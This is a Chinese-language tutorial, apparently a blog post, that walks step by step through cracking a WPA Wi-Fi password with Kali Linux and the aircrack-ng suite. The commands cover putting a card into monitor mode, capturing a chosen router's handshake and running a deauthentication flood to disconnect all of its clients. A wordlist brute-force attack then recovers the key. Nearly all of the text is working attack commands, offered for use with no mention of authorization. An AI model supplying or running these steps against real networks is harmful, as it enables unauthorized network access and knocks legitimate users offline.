1.kali linux安全渗透
2.工具aircrack-ng
3.ifconfig查看你的网卡信息,wlan0即无线网卡,注意,如果没有发现网卡可能是芯片不能被识别,建议选择网卡芯片为3037或rtl8187l的。
4。看到这个界面后输入airmon-ng start wlan0(启动网卡监听模式)
5.启动后ifconfig查看一下,如果网卡名变成了wlan0mon了,则表示操作成功。
6.扫描附近wifi
airodump-ng wlan0mon
参数详解:
BSSID: MAC地址
PWR:信号强度,越小信号越强。
#Data:传输的数据, 数据越大对我们越有利, 大的夸张的可能在看电影
CH:信号频道
ESSID:wifi名称
抓包开始
(比如我要抓的是这个)
7.然后输入命令:
airodump-ng -c 11 --bssid 2E:E9:D3:28:59:EB -w /home/chenglee/2018/ wlan0mon
解析:
-c代表频道, 后面带的是频道
bssid: mac地址(物理地址)
-w代表目录(抓到的握手包放在这个目录下面)
wlan0mon: 网卡名称
一直跑吖跑, 它的数据是不停刷新变化的...
这时候应该做点什么了,利用deauth洪水攻击,取消目标路由和所有设备的无线连接,这时候设备重新连接时,会抓取他的握手包,然后用字典进行爆破.
新开一个窗口观察
ps:如果无法获取包,攻击路由器进行断网重新连接
输入:aireplay-ng -0 0 -a 2E:E9:D3:28:59:EB wlan0mon
这时候目标路由已经断网,如果抓到包记得ctrl+c关掉这里,否则一直断网就成恶作剧了。这时返回你抓包的那个窗口,如果右上角出现handshake这样的信息(看下图),这说明抓包已经成功。
可以进去目录看一下
8.破解
输入:aircrack-ng -w /home/chenglee/dictionary/wpa.txt /home/chenglee/2018/-01.cap
解析:
-w后面接的是字典
-01.cap是握手包
也许过程会有点长, 这个得看密码复杂的与字典的好坏。
